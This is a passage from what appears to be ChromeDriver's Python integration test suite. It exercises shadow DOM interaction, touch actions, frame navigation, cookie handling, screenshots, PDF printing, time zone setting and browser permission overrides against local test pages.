'/chromedriver/shadow_dom_test.html'))
elem = self._FindElementInShadowDom(
["#innerDiv", "#parentDiv", "#textBox"])
elem.Clear()
self.assertEqual("", self._driver.ExecuteScript(
'return arguments[0].value;', elem))
def testShadowDomClick(self):
"""Checks that chromedriver can call Click on an element in a shadow DOM."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
# Wait for page to stabilize. See https://crbug.com/954553#c7
time.sleep(1)
elem = self._FindElementInShadowDom(
["#innerDiv", "#parentDiv", "#button"])
elem.Click()
# the button's onClicked handler changes the text box's value
self.assertEqual("Button Was Clicked", self._driver.ExecuteScript(
'return arguments[0].value;',
self._FindElementInShadowDom(["#innerDiv", "#parentDiv", "#textBox"])))
def testShadowDomActionClick(self):
'''Checks that ChromeDriver can use actions API to click on an element in a
shadow DOM.'''
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
# Wait for page to stabilize. See https://crbug.com/954553#c7
time.sleep(1)
elem = self._FindElementInShadowDom(
['#innerDiv', '#parentDiv', '#button'])
actions = ({'actions': [{
'type': 'pointer',
'actions': [{'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem},
{'type': 'pointerDown', 'button': 0},
{'type': 'pointerUp', 'button': 0}],
'id': 'pointer1'}]})
self._driver.PerformActions(actions)
# the button's onClicked handler changes the text box's value
self.assertEqual('Button Was Clicked', self._driver.ExecuteScript(
'return arguments[0].value;',
self._FindElementInShadowDom(['#innerDiv', '#parentDiv', '#textBox'])))
def testShadowDomStaleReference(self):
"""Checks that trying to manipulate shadow DOM elements that are detached
from the document raises a StaleElementReference exception"""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._FindElementInShadowDom(
["#innerDiv", "#parentDiv", "#button"])
self._driver.ExecuteScript(
'document.querySelector("#outerDiv").innerHTML="<div/>";')
with self.assertRaises(chromedriver.StaleElementReference):
elem.Click()
def testTouchDownMoveUpElement(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/touch_action_tests.html'))
target = self._driver.FindElement('css selector', '#target')
location = target.GetLocation()
self._driver.TouchDown(location['x'], location['y'])
events = self._driver.FindElement('css selector', '#events')
self.assertEquals('events: touchstart', events.GetText())
self._driver.TouchMove(location['x'] + 1, location['y'] + 1)
self.assertEquals('events: touchstart touchmove', events.GetText())
self._driver.TouchUp(location['x'] + 1, location['y'] + 1)
self.assertEquals('events: touchstart touchmove touchend', events.GetText())
def testGetElementRect(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/absolute_position_element.html'))
target = self._driver.FindElement('css selector', '#target')
rect = target.GetRect()
self.assertEquals(18, rect['x'])
self.assertEquals(10, rect['y'])
self.assertEquals(200, rect['height'])
self.assertEquals(210, rect['width'])
def testTouchFlickElement(self):
dx = 3
dy = 4
speed = 5
flickTouchEventsPerSecond = 30
moveEvents = int(
math.sqrt(dx * dx + dy * dy) * flickTouchEventsPerSecond / speed)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchstart", function() {'
' div.innerHTML = "preMove0";'
'});'
'div.addEventListener("touchmove", function() {'
' res = div.innerHTML.match(/preMove(\d+)/);'
' if (res != null) {'
' div.innerHTML = "preMove" + (parseInt(res[1], 10) + 1);'
' }'
'});'
'div.addEventListener("touchend", function() {'
' if (div.innerHTML == "preMove' + str(moveEvents) + '") {'
' div.innerHTML = "new<br>";'
' }'
'});'
'return div;')
self._driver.TouchFlick(div, dx, dy, speed)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testSwitchesToTopFrameAfterNavigation(self):
self._driver.Load('about:blank')
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html'))
p = self._driver.FindElement('tag name', 'p')
self.assertEquals('Two', p.GetText())
def testSwitchesToTopFrameAfterRefresh(self):
self._driver.Load('about:blank')
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
self._driver.Refresh()
p = self._driver.FindElement('tag name', 'p')
self.assertEquals('Two', p.GetText())
def testSwitchesToTopFrameAfterGoingBack(self):
self._driver.Load('about:blank')
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/inner.html'))
self._driver.GoBack()
p = self._driver.FindElement('tag name', 'p')
self.assertEquals('Two', p.GetText())
def testCanSwitchToPrintPreviewDialog(self):
old_handles = self._driver.GetWindowHandles()
print("Test debug: actual len of old_handles: " + str(len(old_handles)),
file = sys.stdout)
self.assertEquals(1, len(old_handles))
self._driver.ExecuteScript('setTimeout(function(){window.print();}, 0);')
new_window_handle = self.WaitForNewWindow(self._driver, old_handles)
if new_window_handle is None:
print("Test debug: new_window_handle is None", file = sys.stdout)
else:
print("Test debug: new_window_handle is not None", file = sys.stdout)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
print("Test debug: actual GetCurrentUrl: " + self._driver.GetCurrentUrl(),
file = sys.stdout)
self.assertEquals('chrome://print/', self._driver.GetCurrentUrl())
def testCanClickInIframes(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/nested.html'))
a = self._driver.FindElement('tag name', 'a')
a.Click()
frame_url = self._driver.ExecuteScript('return window.location.href')
self.assertTrue(frame_url.endswith('#one'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
a = self._driver.FindElement('tag name', 'a')
a.Click()
frame_url = self._driver.ExecuteScript('return window.location.href')
self.assertTrue(frame_url.endswith('#two'))
def testDoesntHangOnFragmentNavigation(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html#x'))
def SetCookie(self, request):
return {'Set-Cookie': 'x=y; HttpOnly'}, "<!DOCTYPE html><html></html>"
def testGetHttpOnlyCookie(self):
self._http_server.SetCallbackForPath('/setCookie', self.SetCookie)
self._driver.Load(self.GetHttpUrlForFile('/setCookie'))
self._driver.AddCookie({'name': 'a', 'value': 'b'})
cookies = self._driver.GetCookies()
self.assertEquals(2, len(cookies))
for cookie in cookies:
self.assertIn('name', cookie)
if cookie['name'] == 'a':
self.assertFalse(cookie['httpOnly'])
elif cookie['name'] == 'x':
self.assertTrue(cookie['httpOnly'])
else:
self.fail('unexpected cookie: %s' % json.dumps(cookie))
def testCookiePath(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/long_url/empty.html'))
self._driver.AddCookie({'name': 'a', 'value': 'b'})
self._driver.AddCookie({
'name': 'x', 'value': 'y', 'path': '/chromedriver/long_url'})
cookies = self._driver.GetCookies()
self.assertEquals(2, len(cookies))
for cookie in cookies:
self.assertIn('path', cookie)
if cookie['name'] == 'a':
self.assertEquals('/' , cookie['path'])
if cookie['name'] == 'x':
self.assertEquals('/chromedriver/long_url' , cookie['path'])
def testGetNamedCookie(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/empty.html'))
self._driver.AddCookie({'name': 'a', 'value': 'b'})
named_cookie = self._driver.GetNamedCookie('a')
self.assertEquals('a' , named_cookie['name'])
self.assertEquals('b' , named_cookie['value'])
self.assertRaisesRegexp(
chromedriver.NoSuchCookie, "no such cookie",
self._driver.GetNamedCookie, 'foo')
def testDeleteCookie(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/empty.html'))
self._driver.AddCookie({'name': 'a', 'value': 'b'})
self._driver.AddCookie({'name': 'x', 'value': 'y'})
self._driver.AddCookie({'name': 'p', 'value': 'q'})
cookies = self._driver.GetCookies()
self.assertEquals(3, len(cookies))
self._driver.DeleteCookie('a')
self.assertEquals(2, len(self._driver.GetCookies()))
self._driver.DeleteAllCookies()
self.assertEquals(0, len(self._driver.GetCookies()))
def testCookieForFrame(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/cross_domain_iframe.html'))
self._driver.AddCookie({'name': 'outer', 'value': 'main context'})
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
self.assertTrue(self.WaitForCondition(
lambda: 'outer.html' in
self._driver.ExecuteScript('return window.location.href')))
self._driver.AddCookie({'name': 'inner', 'value': 'frame context'})
cookies = self._driver.GetCookies()
self.assertEquals(1, len(cookies))
self.assertEquals('inner', cookies[0]['name'])
self._driver.SwitchToMainFrame()
cookies = self._driver.GetCookies()
self.assertEquals(1, len(cookies))
self.assertEquals('outer', cookies[0]['name'])
def testCanClickAlertInIframes(self):
# This test requires that the page be loaded from a file:// URI, rather than
# the test HTTP server.
path = os.path.join(chrome_paths.GetTestData(), 'chromedriver',
'page_with_frame.html')
url = 'file://' + six.moves.urllib.request.pathname2url(path)
self._driver.Load(url)
frame = self._driver.FindElement('css selector', '#frm')
self._driver.SwitchToFrame(frame)
a = self._driver.FindElement('css selector', '#btn')
a.Click()
self.WaitForCondition(lambda: self._driver.IsAlertOpen())
self._driver.HandleAlert(True)
def testThrowErrorWithExecuteScript(self):
self.assertRaisesRegexp(
chromedriver.JavaScriptError, "some error",
self._driver.ExecuteScript, 'throw new Error("some error")')
def testDoesntCrashWhenScriptLogsUndefinedValue(self):
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=1547
self._driver.ExecuteScript('var b; console.log(b);')
def testDoesntThrowWhenPageLogsUndefinedValue(self):
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=1547
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/log_undefined_value.html'))
def testCanSetCheckboxWithSpaceKey(self):
self._driver.Load('about:blank')
self._driver.ExecuteScript(
"document.body.innerHTML = '<input type=\"checkbox\">';")
checkbox = self._driver.FindElement('tag name', 'input')
self.assertFalse(
self._driver.ExecuteScript('return arguments[0].checked', checkbox))
checkbox.SendKeys(' ')
self.assertTrue(
self._driver.ExecuteScript('return arguments[0].checked', checkbox))
def testElementReference(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/element_ref.html'))
element = self._driver.FindElement('css selector', '#link')
self._driver.FindElements('tag name', 'br')
w3c_id_length = 36
if (self._driver.w3c_compliant):
self.assertEquals(len(element._id), w3c_id_length)
def testFindElementWhenElementIsOverridden(self):
self._driver.Load('about:blank')
self._driver.ExecuteScript(
'document.body.appendChild(document.createElement("a"));')
self._driver.ExecuteScript('window.Element = {}')
self.assertEquals(1, len(self._driver.FindElements('tag name', 'a')))
def testExecuteScriptWhenObjectPrototypeIsModified(self):
# Some JavaScript libraries (e.g. MooTools) do things like this. For context
# see https://bugs.chromium.org/p/chromedriver/issues/detail?id=1521
self._driver.Load('about:blank')
self._driver.ExecuteScript('Object.prototype.$family = undefined;')
self.assertEquals(1, self._driver.ExecuteScript('return 1;'))
def testWebWorkerFrames(self):
"""Verify web worker frames are handled correctly.
Regression test for bug
https://bugs.chromium.org/p/chromedriver/issues/detail?id=2340.
The bug was triggered by opening a page with web worker, and then opening a
page on a different site. We simulate a different site by using 'localhost'
as the host name (default is '127.0.0.1').
"""
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/web_worker.html'))
self._driver.Load(self._http_server.GetUrl('localhost')
+ '/chromedriver/empty.html')
def testWaitForCurrentFrameToLoad(self):
"""Verify ChromeDriver waits for loading events of current frame
Regression test for bug
https://bugs.chromium.org/p/chromedriver/issues/detail?id=3164
Clicking element in frame triggers reload of that frame, click should not
return until loading is complete.
"""
def waitAndRespond():
# test may not detect regression without small sleep.
# locally, .2 didn't fail before code change, .3 did
time.sleep(.5)
self._sync_server.RespondWithContent(
"""
<html>
<body>
<p id='valueToRead'>11</p>
</body>
</html>
""")
self._http_server.SetDataForPath('/page10.html',
"""
<html>
<head>
<title>
Frame
</title>
<script>
function reloadWith(i) {
window.location.assign('%s');
}
</script>
</head>
<body>
<button id='prev' onclick="reloadWith(9)">-1</button>
<button id='next' onclick="reloadWith(11)">+1</button>
<p id='valueToRead'>10</p>
</body>
</html>
""" % self._sync_server.GetUrl())
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/page_for_next_iframe.html'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame);
thread = threading.Thread(target=waitAndRespond)
thread.start()
self._driver.FindElement('css selector', '#next').Click()
value_display = self._driver.FindElement('css selector', '#valueToRead')
self.assertEquals('11', value_display.GetText())
def testSlowIFrame(self):
"""Verify ChromeDriver does not wait for slow frames to load.
Regression test for bugs
https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198 and
https://bugs.chromium.org/p/chromedriver/issues/detail?id=2350.
"""
def waitAndRespond():
# Send iframe contents slowly
time.sleep(2)
self._sync_server.RespondWithContent(
'<html><div id=iframediv>IFrame contents</div></html>')
self._http_server.SetDataForPath('/top.html',
"""
<html><body>
<div id='top'>
<input id='button' type="button" onclick="run()" value='Click'>
</div>
<script>
function run() {
var iframe = document.createElement('iframe');
iframe.id = 'iframe';
iframe.setAttribute('src', '%s');
document.body.appendChild(iframe);
}
</script>
</body></html>""" % self._sync_server.GetUrl())
self._driver.Load(self._http_server.GetUrl() + '/top.html')
thread = threading.Thread(target=waitAndRespond)
thread.start()
start = monotonic()
# Click should not wait for frame to load, so elapsed time from this
# command should be < 2 seconds.
self._driver.FindElement('css selector', '#button').Click()
self.assertLess(monotonic() - start, 2.0)
frame = self._driver.FindElement('css selector', '#iframe')
# WaitForPendingNavigations examines the load state of the current frame
# so ChromeDriver will wait for frame to load after SwitchToFrame
# start is reused because that began the pause for the frame load
self._driver.SwitchToFrame(frame)
self.assertGreaterEqual(monotonic() - start, 2.0)
self._driver.FindElement('css selector', '#iframediv')
thread.join()
@staticmethod
def MakeRedImageTestScript(png_data_in_base64):
"""Used by the takeElementScreenshot* tests to load the PNG image via a data
URI, analyze it, and PASS/FAIL depending on whether all the pixels are all
rgb(255,0,0)."""
return (
"""
const resolve = arguments[arguments.length - 1];
const image = new Image();
image.onload = () => {
var canvas = document.createElement('canvas');
canvas.width = image.width;
canvas.height = image.height;
var context = canvas.getContext('2d');
context.drawImage(image, 0, 0);
const pixels =
context.getImageData(0, 0, image.width, image.height).data;
for (let i = 0; i < pixels.length; i += 4) {
if (pixels[i + 0] != 255 || // Red
pixels[i + 1] != 0 || // Green
pixels[i + 2] != 0) { // Blue
const message = (
'FAIL: Bad pixel rgb(' + pixels.slice(i, i + 3).join(',') +
') at offset ' + i + ' from ' + image.src);
// "Disabled" on Mac 10.10: 1/15 test runs produces an incorrect
// pixel. Since no later Mac version, nor any other platform,
// exhibits this problem, we assume this is due to a bug in this
// specific version of Mac OS. So, just log the error and pass
// the test. http://crbug.com/913603
if (navigator.userAgent.indexOf('Mac OS X 10_10') != -1) {
console.error(message);
console.error('Passing test due to Mac 10.10-specific bug.');
resolve('PASS');
} else {
resolve(message);
}
return;
}
}
resolve('PASS');
};
image.src = 'data:image/png;base64,%s';
""" % png_data_in_base64.replace("'", "\\'"))
def takeScreenshotAndVerifyCorrect(self, element):
""" Takes screenshot of given element and returns
'PASS' if all pixels in screenshot are rgb(255, 0, 0)
and 'FAIL' otherwise
"""
elementScreenshotPNGBase64 = element.TakeElementScreenshot()
self.assertIsNotNone(elementScreenshotPNGBase64)
return self._driver.ExecuteAsyncScript(
ChromeDriverTest.MakeRedImageTestScript(elementScreenshotPNGBase64))
def testTakeElementScreenshot(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/page_with_redbox.html'))
# Wait for page to stabilize in case of Chrome showing top bars.
# See https://crbug.com/chromedriver/2986
time.sleep(1)
redElement = self._driver.FindElement('css selector', '#box')
analysisResult = self.takeScreenshotAndVerifyCorrect(redElement)
self.assertEquals('PASS', analysisResult)
def testTakeElementScreenshotPartlyVisible(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/page_with_redbox_partly_visible.html'))
self._driver.SetWindowRect(500, 500, 0, 0)
# Wait for page to stabilize. See https://crbug.com/chromedriver/2986
time.sleep(1)
redElement = self._driver.FindElement('css selector', '#box')
analysisResult = self.takeScreenshotAndVerifyCorrect(redElement)
self.assertEquals('PASS', analysisResult)
def testTakeElementScreenshotInIframe(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/page_with_iframe_redbox.html'))
frame = self._driver.FindElement('css selector', '#frm')
self._driver.SwitchToFrame(frame)
# Wait for page to stabilize in case of Chrome showing top bars.
# See https://crbug.com/chromedriver/2986
time.sleep(1)
redElement = self._driver.FindElement('css selector', '#box')
analysisResult = self.takeScreenshotAndVerifyCorrect(redElement)
self.assertEquals('PASS', analysisResult)
def testTakeLargeElementScreenshot(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/large_element.html'))
self._driver.SetWindowRect(500, 500, 0, 0)
# Wait for page to stabilize. See https://crbug.com/chromedriver/2986
time.sleep(1)
redElement = self._driver.FindElement('css selector', '#A')
analysisResult = self.takeScreenshotAndVerifyCorrect(redElement)
self.assertEquals('PASS', analysisResult)
@staticmethod
def png_dimensions(png_data_in_base64):
image = base64.b64decode(png_data_in_base64)
width, height = struct.unpack('>LL', image[16:24])
return int(width), int(height)
def testTakeLargeElementViewportScreenshot(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/large_element.html'))
self._driver.SetWindowRect(640, 400, 0, 0)
# Wait for page to stabilize. See https://crbug.com/chromedriver/2986
time.sleep(1)
viewportScreenshotPNGBase64 = self._driver.TakeScreenshot()
self.assertIsNotNone(viewportScreenshotPNGBase64)
mime_type = imghdr.what('', base64.b64decode(viewportScreenshotPNGBase64))
self.assertEqual('png', mime_type)
image_width, image_height = self.png_dimensions(viewportScreenshotPNGBase64)
viewport_width, viewport_height = self._driver.ExecuteScript(
'''
const {devicePixelRatio, innerHeight, innerWidth} = window;
return [
Math.floor(innerWidth * devicePixelRatio),
Math.floor(innerHeight * devicePixelRatio)
];
''')
self.assertEquals(image_width, viewport_width)
self.assertEquals(image_height, viewport_height)
def testTakeLargeElementFullPageScreenshot(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/large_element.html'))
width = 640
height = 400
self._driver.SetWindowRect(width, height, 0, 0)
# Wait for page to stabilize. See https://crbug.com/chromedriver/2986
time.sleep(1)
fullpageScreenshotPNGBase64 = self._driver.TakeFullPageScreenshot()
self.assertIsNotNone(fullpageScreenshotPNGBase64)
mime_type = imghdr.what('', base64.b64decode(fullpageScreenshotPNGBase64))
self.assertEqual('png', mime_type)
image_width, image_height = self.png_dimensions(fullpageScreenshotPNGBase64)
# According to https://javascript.info/size-and-scroll-window,
# width/height of the whole document, with the scrolled out part
page_width, page_height = self._driver.ExecuteScript(
'''
const body = document.body;
const doc = document.documentElement;
const width = Math.max(body.scrollWidth, body.offsetWidth,\
body.clientWidth, doc.scrollWidth,\
doc.offsetWidth, doc.clientWidth);
const height = Math.max(body.scrollHeight, body.offsetHeight,\
body.clientHeight, doc.scrollHeight,\
doc.offsetHeight, doc.clientHeight);
return [
width,
height
];
''')
self.assertEquals(image_width, page_width)
self.assertEquals(image_height, page_height)
# Assert Window Rect size stay the same after taking fullpage screenshot
size = self._driver.GetWindowRect()
self.assertEquals(size[0], width)
self.assertEquals(size[1], height)
# Verify scroll bars presence after test
horizontal_scroll_bar, vertical_scroll_bar = self._driver.ExecuteScript(
'''
const doc = document.documentElement;
return [
doc.scrollWidth > doc.clientWidth,
doc.scrollHeight > doc.clientHeight
];
''')
self.assertEquals(horizontal_scroll_bar, True)
self.assertEquals(vertical_scroll_bar, True)
def testPrint(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
pdf = self._driver.PrintPDF({
'orientation': 'landscape',
'scale': 1.1,
'margin': {
'top': 1.1,
'bottom': 2.2,
'left': 3.3,
'right': 4.4
},
'background': True,
'shrinkToFit': False,
'pageRanges': [1],
'page': {
'width': 15.6,
'height': 20.6
}
})
decoded_pdf = base64.b64decode(pdf)
self.assertTrue(decoded_pdf.startswith("%PDF"))
self.assertTrue(decoded_pdf.endswith("%%EOF"))
def testPrintInvalidArgument(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self.assertRaises(chromedriver.InvalidArgument,
self._driver.PrintPDF, {'pageRanges': ['x-y']})
def testGenerateTestReport(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/reporting_observer.html'))
self._driver.GenerateTestReport('test report message');
report = self._driver.ExecuteScript('return window.result;')
self.assertEquals('test', report['type']);
self.assertEquals('test report message', report['body']['message']);
def testSetTimeZone(self):
defaultTimeZoneScript = '''
return (new Intl.DateTimeFormat()).resolvedOptions().timeZone;
''';
localHourScript = '''
return (new Date("2020-10-10T00:00:00Z")).getHours();
''';
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
# Test to switch to Taipei
self._driver.SetTimeZone('Asia/Taipei');
timeZone = self._driver.ExecuteScript(defaultTimeZoneScript)
self.assertEquals('Asia/Taipei', timeZone);
localHour = self._driver.ExecuteScript(localHourScript)
# Taipei time is GMT+8. Not observes DST.
self.assertEquals(8, localHour);
# Test to switch to Tokyo
self._driver.SetTimeZone('Asia/Tokyo');
timeZone = self._driver.ExecuteScript(defaultTimeZoneScript)
self.assertEquals('Asia/Tokyo', timeZone);
localHour = self._driver.ExecuteScript(localHourScript)
# Tokyo time is GMT+9. Not observes DST.
self.assertEquals(9, localHour);
def GetPermissionWithQuery(self, query):
script = """
let query = arguments[0];
let done = arguments[1];
console.log(done);
navigator.permissions.query(query)
.then(function(value) {
done({ status: 'success', value: value && value.state });
}, function(error) {
done({ status: 'error', value: error && error.message });
});
"""
return self._driver.ExecuteAsyncScript(script, query)
def GetPermission(self, name):
return self.GetPermissionWithQuery({ 'name': name })
def CheckPermission(self, response, expected_state):
self.assertEquals(response['status'], 'success')
self.assertEquals(response['value'], expected_state)
def testPermissionsOpaqueOriginsThrowError(self):
""" Confirms that opaque origins cannot have overrides. """
self._driver.Load("about:blank")
self.assertRaises(chromedriver.InvalidArgument,
self._driver.SetPermission, {'descriptor': { 'name': 'geolocation' },
'state': 'denied'})
def testPermissionStates(self):
""" Confirms that denied, granted, and prompt can be set. """
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.SetPermission({
'descriptor': { 'name': 'geolocation' },
'state': 'denied'
})
self.CheckPermission(self.GetPermission('geolocation'), 'denied')
self._driver.SetPermission({
'descriptor': { 'name': 'geolocation' },
'state': 'granted'
})
self.CheckPermission(self.GetPermission('geolocation'), 'granted')
self._driver.SetPermission({
'descriptor': { 'name': 'geolocation' },
'state': 'prompt'
})
self.CheckPermission(self.GetPermission('geolocation'), 'prompt')
def testSettingPermissionDoesNotAffectOthers(self):
""" Confirm permissions do not affect unset permissions. """
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
response = self.GetPermission('geolocation')
self.assertEquals(response['status'], 'success')
status = response['value']
self._driver.SetPermission({
'descriptor': { 'name': 'background-sync' },
'state': 'denied'
})
self.CheckPermission(self.GetPermission('background-sync'), 'denied')
self.CheckPermission(self.GetPermission('geolocation'), status)
def testMultiplePermissions(self):
""" Confirms multiple custom permissions can be set simultaneously. """
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.SetPermission({
'descriptor': { 'name': 'geolocation' },
'state': 'denied'
})
self._driver.SetPermission({
'descriptor': { 'name': 'background-fetch' },
'state': 'prompt'
})
self._driver.SetPermission({
'descriptor': { 'name': 'background-sync' },
'state': 'granted'
})
self.CheckPermission(self.GetPermission('geolocation'), 'denied')
self.CheckPermission(self.GetPermission('background-fetch'), 'prompt')
self.CheckPermission(self.GetPermission('background-sync'), 'granted')
def testSensorPermissions(self):
""" Tests sensor permissions.
Currently, Chrome controls all sensor permissions (accelerometer,
magnetometer, gyroscope, ambient-light-sensor) with the 'sensors'
permission. This test demonstrates this internal implementation detail so
developers are aware of this behavior.
"""
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
parameters = {
'descriptor': { 'name': 'magnetometer' },
'state': 'granted'
}
self._driver.SetPermission(parameters)
# Light sensor is not enabled by default, so it cannot be queried or set.
#self.CheckPermission(self.GetPermission('ambient-light-sensor'), 'granted')
self.CheckPermission(self.GetPermission('magnetometer'), 'granted')
self.CheckPermission(self.GetPermission('accelerometer'), 'granted')
self.CheckPermission(self.GetPermission('gyroscope'), 'granted')
parameters = {
'descriptor': { 'name': 'gyroscope' },
'state': 'denied'
}
self._driver.SetPermission(parameters)
#self.CheckPermission(self.GetPermission('ambient-light-sensor'), 'denied')
self.CheckPermission(self.GetPermission('magnetometer'), 'denied')
self.CheckPermission(self.GetPermission('accelerometer'), 'denied')
self.CheckPermission(self.GetPermission('gyroscope'), 'denied')
def testMidiPermissions(self):
""" Tests midi permission requirements.
MIDI, sysex: true, when granted, should automatically grant regular MIDI
permissions.
When regular MIDI is denied, this should also imply MIDI with sysex is
denied.
"""
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
parameters = {
'descriptor': { 'name': 'midi', 'sysex': True },
'state': 'granted'
}
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
'granted')
parameters['descriptor']['sysex'] = False
self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
'granted')
parameters = {
'descriptor': { 'name': 'midi', 'sysex': False },
'state': 'denied'
}
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
'denied')
# While this should be denied, Chrome does not do this.
# parameters['descriptor']['sysex'] = True should be denied.
def testClipboardPermissions(self):
""" Tests clipboard permission requirements.
clipboard-read with allowWithoutSanitization: true or false, and
clipboard-write with allowWithoutSanitization: true are bundled together
into one CLIPBOARD_READ_WRITE permission.
clipboard write with allowWithoutSanitization: false is an auto-granted
permission.
"""
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
parameters = {
'descriptor': {
'name': 'clipboard-read' ,
'allowWithoutSanitization': False
},
'state': 'granted'
}
raw_write_parameters = {
'descriptor': {
'name': 'clipboard-write',
'allowWithoutSanitization': True
}
}
self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
'prompt')
self.CheckPermission(self.GetPermissionWithQuery(
raw_write_parameters['descriptor']), 'prompt')
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
'granted')
parameters['descriptor']['allowWithoutSanitization'] = True
self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
'granted')
parameters['descriptor']['name'] = 'clipboard-write'
self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
'granted')
parameters = {
'descriptor': { 'name': 'clipboard-write' },
'state': 'prompt'
}
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermission('clipboard-read'), 'granted')
self.CheckPermission(self.GetPermission('clipboard-write'), 'prompt')
def testPersistentStoragePermissions(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
parameters = {
'descriptor': { 'name': 'persistent-storage' },
'state': 'granted'
}
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermission('persistent-storage'), 'granted')
parameters['state'] = 'denied'
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermission('persistent-storage'), 'denied')
def testPushAndNotificationsPermissions(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
parameters = {
'descriptor': { 'name': 'notifications' },
'state': 'granted'
}
push_descriptor = {
'name': 'push',
'userVisibleOnly': True
}
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermission('notifications'), 'granted')
self.CheckPermission(self.GetPermissionWithQuery(push_descriptor),
'granted')
parameters['state'] = 'denied'
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermission('notifications'), 'denied')
self.CheckPermission(self.GetPermissionWithQuery(push_descriptor), 'denied')
push_descriptor['userVisibleOnly'] = False
parameters = {
'descriptor': push_descriptor,
'state': 'prompt'
}
self.assertRaises(chromedriver.InvalidArgument,
self._driver.SetPermission, parameters)
def testPermissionsSameOrigin(self):
""" Assures permissions are shared between same-domain windows. """
window_handle = self._driver.NewWindow()['handle']
self._driver.SwitchToWindow(window_handle)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html'))
another_window_handle = self._driver.NewWindow()['handle']
self._driver.SwitchToWindow(another_window_handle)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
# Set permission.
parameters = { 'descriptor': { 'name': 'geolocation' }, 'state': 'granted' }
# Test that they are present across the same domain.
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermission('geolocation'), 'granted')
self._driver.SwitchToWindow(window_handle)
self.CheckPermission(self.GetPermission('geolocation'), 'granted')
def testNewWindowSameDomainHasSamePermissions(self):
""" Assures permissions are shared between same-domain windows, even when
window is created after permissions are set. """
window_handle = self._driver.NewWindow()['handle']
self._driver.SwitchToWindow(window_handle)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' },
'state': 'denied' })
self.CheckPermission(self.GetPermission('geolocation'), 'denied')
same_domain = self._driver.NewWindow()['handle']
self._driver.SwitchToWindow(same_domain)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html'))
